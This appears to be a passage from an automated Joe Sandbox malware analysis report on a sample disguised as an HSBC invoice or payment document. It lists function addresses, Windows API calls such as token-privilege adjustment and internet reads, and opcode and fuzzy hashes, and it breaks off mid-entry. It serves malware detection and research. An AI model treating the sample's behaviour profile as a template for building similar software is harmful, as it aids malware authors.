                    Download Yara Rule
                    APIs
                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00EF26D5
                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EF270C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Internet$AvailableDataFileQueryRead
                    • String ID:
                    • API String ID: 599397726-0
                    • Opcode ID: e815a5b3e5d678e8cc2c4da6b225721a34b3a4b995ca11b6bdf2baf09f8258fb
                    • Instruction ID: cfaf21938d6db9ff6aad796c2f18cfa734f10429f794df11fad81142b9591300
                    • Opcode Fuzzy Hash: e815a5b3e5d678e8cc2c4da6b225721a34b3a4b995ca11b6bdf2baf09f8258fb
                    • Instruction Fuzzy Hash: 6941C27190020DBFEB20DA54CC85EBBB7ECEB44758F10506EF701B6180EB71AE419655
                    Function 00EEB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00EEB5AE
                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00EEB608
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00EEB655
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ErrorMode$DiskFreeSpace
                    • String ID:
                    • API String ID: 1682464887-0
                    • Opcode ID: 0b45cbb40a3d44cbea018c628e09050041e4637082f59a30ecf20f7fdeda5721
                    • Instruction ID: 7c9adc8740f412e9f912c380613956f9f3d3e422b88a89df99e39383a81b3542
                    • Opcode Fuzzy Hash: 0b45cbb40a3d44cbea018c628e09050041e4637082f59a30ecf20f7fdeda5721
                    • Instruction Fuzzy Hash: 0B213275A0051CEFCB00EF95D884AADBBF8FF48314F1480AAE949AB351DB319955CB51
                    Function 00ED8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EA0FF6: std::exception::exception.LIBCMT ref: 00EA102C
                      • Part of subcall function 00EA0FF6: __CxxThrowException@8.LIBCMT ref: 00EA1041
                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ED8D0D
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ED8D3A
                    • GetLastError.KERNEL32 ref: 00ED8D47
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                    • String ID:
                    • API String ID: 1922334811-0
                    • Opcode ID: 3bda9a1e567a7660775ae3c3d24a19afeea65d8695d2627dab42af7dce8640e7
                    • Instruction ID: ddf8391c26c1bdecff151c3bbd4de05362cb4def19c3829291a12fee2198b7c5
                    • Opcode Fuzzy Hash: 3bda9a1e567a7660775ae3c3d24a19afeea65d8695d2627dab42af7dce8640e7
                    • Instruction Fuzzy Hash: EA11CEB1514208AFE728EF64DD85D6BB7FDFB08710B20852EF456A7681EB30BC418A20
                    Function 00EE4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                    Download Yara Rule
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00EE4C2C
                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00EE4C43
                    • FreeSid.ADVAPI32(?), ref: 00EE4C53
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    • Opcode ID: 416c073cb0fa2dd3782fb245102799e3fc5b6fbaf581fdd1ad38304888c8082b
                    • Instruction ID: a5d3660b7dd33a8196ea3e48b2df11d83859913967dc8125c8a554d6e539f1a1
                    • Opcode Fuzzy Hash: 416c073cb0fa2dd3782fb245102799e3fc5b6fbaf581fdd1ad38304888c8082b
                    • Instruction Fuzzy Hash: B7F04975A1130CBFEF04DFF0DC89AAEBBBCFF08301F1044A9A901E2581E6746A089B50
                    Function 00E8E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f8dcdb5fb8e00b8fd3401ff422ece535b24a73db53f4ad2863e147be102e6066
                    • Instruction ID: 2d3077b11a46eb7f437cd6c924cb4a7998b3c3e968f18d79c249e34cf9671da6
                    • Opcode Fuzzy Hash: f8dcdb5fb8e00b8fd3401ff422ece535b24a73db53f4ad2863e147be102e6066
                    • Instruction Fuzzy Hash: 26228A74A00216CFDB24EF64C584AAAB7F0FF09304F149469E85EBB351E771AD85CB91
                    Function 00E816DE Relevance: 3.1, APIs: 2, Instructions: 83nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                      • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                    • GetParent.USER32(?), ref: 00EBBA0A
                    • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00E819B3,?,?,?,00000006,?), ref: 00EBBA84
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: LongWindow$DialogNtdllParentProc_
                    • String ID:
                    • API String ID: 314495775-0
                    • Opcode ID: 7886679f19463a4f0c9b6036718bacdd64df10a3ccf90665d24624386e916119
                    • Instruction ID: e4177cf55b5140af63cfad540227d8d0020ebc9cd9a6a5e58c4175165fa9c69a
                    • Opcode Fuzzy Hash: 7886679f19463a4f0c9b6036718bacdd64df10a3ccf90665d24624386e916119
                    • Instruction Fuzzy Hash: 8F218734600104AFCB219B28C884DE93BD6AF0B328F5452A9F51D7B2F1C7715D52A751
                    Function 00EEC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 00EEC966
                    • FindClose.KERNEL32(00000000), ref: 00EEC996
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 0f85d7fd1cd072f86580eedf78a1beb46bbd24c11ab5fe631f82ee48521b1f30
                    • Instruction ID: 9727fba12dd3a27d2db8033c6ff1fc81479a0cf64873becd3186bcba86bbe390
                    • Opcode Fuzzy Hash: 0f85d7fd1cd072f86580eedf78a1beb46bbd24c11ab5fe631f82ee48521b1f30
                    • Instruction Fuzzy Hash: 791161726106049FD710EF29D845A2AF7E9FF84324F14955EF9AAE7292DB30AC05CB81
                    Function 00F0C86D Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00EBBB8A,?,?,?), ref: 00F0C8E1
                      • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00F0C8C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: LongWindow$DialogMessageNtdllProc_Send
                    • String ID:
                    • API String ID: 1273190321-0
                    • Opcode ID: 39cab49dcae564c1b075bb1e7bf25e4c80952ac915d2f34e5bf793082fb55900
                    • Instruction ID: 04ee7d7fb0806de914e214d00dceeef526fda6b24d2069f48a9ba56306d84e28
                    • Opcode Fuzzy Hash: 39cab49dcae564c1b075bb1e7bf25e4c80952ac915d2f34e5bf793082fb55900
                    • Instruction Fuzzy Hash: 3601FC31200214ABCB21AF14CC44F663BE7FF86324F144128F9555B2E1CB315806FBD1
                    Function 00F0CC2E Relevance: 3.0, APIs: 2, Instructions: 33nativeCOMMON
                    Download Yara Rule
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 00F0CC51
                    • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00EBBC66,?,?,?,?,?), ref: 00F0CC7A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ClientDialogNtdllProc_Screen
                    • String ID:
                    • API String ID: 3420055661-0
                    • Opcode ID: e5fec93d1baac2d9c9c0cbfbf1b592350058088fcc4b64a4dd042a04a0c920ab
                    • Instruction ID: 63b703f95680e7490b56dc9eca1aa33385572254e3bb53db6a4702726f265f16
                    • Opcode Fuzzy Hash: e5fec93d1baac2d9c9c0cbfbf1b592350058088fcc4b64a4dd042a04a0c920ab
                    • Instruction Fuzzy Hash: 1DF0177241021CBFEB158F85DC099AE7BB9FB48321F04416AF945A2161D3716A64EBA0
                    Function 00EEA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00EF977D,?,00F0FB84,?), ref: 00EEA302
                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00EF977D,?,00F0FB84,?), ref: 00EEA314
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: a5a70dadf40328fcf2765dd2160ebc77d2e526c8cf0085f2a6a75d9e306d072e
                    • Instruction ID: 9e5042c3df5e1669131029123254a958a71ff3e8900bbe71b0708725964ca5ec
                    • Opcode Fuzzy Hash: a5a70dadf40328fcf2765dd2160ebc77d2e526c8cf0085f2a6a75d9e306d072e
                    • Instruction Fuzzy Hash: BDF0823554522DABDB20AFA4CC88FEA776DBF08761F00416AB908E6181D630A944CBA1
                    Function 00F0CD6C Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowLongW.USER32(?,000000EC), ref: 00F0CD74
                    • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00EBBBE5,?,?,?,?), ref: 00F0CDA2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    • Opcode ID: bb91dcd99c69ea634d7343006a53e671c60a0b82e689fdde0370197ec1ff1f11
                    • Instruction ID: 2d6cd162df737ac8294dc1f9635bcd0c53207353efcc3c2a6bb2e9f7242dda90
                    • Opcode Fuzzy Hash: bb91dcd99c69ea634d7343006a53e671c60a0b82e689fdde0370197ec1ff1f11
                    • Instruction Fuzzy Hash: 92E08670100258BFEB249F19DC09FBA3B54FB04760F408225F956DA1E1C771D850F760
                    Function 00ED8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00ED8851), ref: 00ED8728
                    • CloseHandle.KERNEL32(?,?,00ED8851), ref: 00ED873A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AdjustCloseHandlePrivilegesToken
                    • String ID:
                    • API String ID: 81990902-0
                    • Opcode ID: 9919dc467bb98d0a338c8bb04268577edb9080e3f812fa8257ac6c95519f8ab1
                    • Instruction ID: 05d9ab3bbdc38ff493f992ee24993d2ece51f5eee3ae31b91af5db586e37567c
                    • Opcode Fuzzy Hash: 9919dc467bb98d0a338c8bb04268577edb9080e3f812fa8257ac6c95519f8ab1
                    • Instruction Fuzzy Hash: 05E04F71000600EFE7312B20ED04D7377E9FB04390B108469B46680430CB616C90EB10
                    Function 00EAA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,00F14178,00EA8F97,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 00EAA39A
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00EAA3A3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 5bdabe3ea7afc431d3db987bcbdc7c72ae71142b8d91ce6e7b3baa21b65a639f
                    • Instruction ID: 58b5cf3a3d5faf2318b4332d9f3ba27b413f6d09c67193c518543aebdd3a23f5
                    • Opcode Fuzzy Hash: 5bdabe3ea7afc431d3db987bcbdc7c72ae71142b8d91ce6e7b3baa21b65a639f
                    • Instruction Fuzzy Hash: 5CB0923105820CABCA102B91EC09B883F68FB45AB2F404020FA0D84860CB625454AA91
                    Function 00EAF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1c8db73c4f3e4e77a6bdb82e52ac7f6dec5ae1c2924b37fd4e62b5304eab86db
                    • Instruction ID: 4e08fa4fd8bd5e0cb21c5c5b7851ab3a8dd2e0f6e7b3a35124f672b009bc922a
                    • Opcode Fuzzy Hash: 1c8db73c4f3e4e77a6bdb82e52ac7f6dec5ae1c2924b37fd4e62b5304eab86db
                    • Instruction Fuzzy Hash: 77324721D69F054DD723A634D832376A258AFFB3D4F15E737F819B99AAEB28D4831100
                    Function 00EB267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 46054dc316078982f0ef1ed83d7a7a1ed915a3790139458be6b26ae7efbf9147
                    • Instruction ID: 87ce0280cd78ec554ff5453c8abc3e90e6707a3db7dd5c19b78bc6f7ca495b18
                    • Opcode Fuzzy Hash: 46054dc316078982f0ef1ed83d7a7a1ed915a3790139458be6b26ae7efbf9147
                    • Instruction Fuzzy Hash: AEB1F020E2AF554DD32396398831336FA5CAFBB2D5F52D71BFC2674D22EB2285835141
                    Function 00EE8B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    • __time64.LIBCMT ref: 00EE8B25
                      • Part of subcall function 00EA543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00EE91F8,00000000,?,?,?,?,00EE93A9,00000000,?), ref: 00EA5443
                      • Part of subcall function 00EA543A: __aulldiv.LIBCMT ref: 00EA5463
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
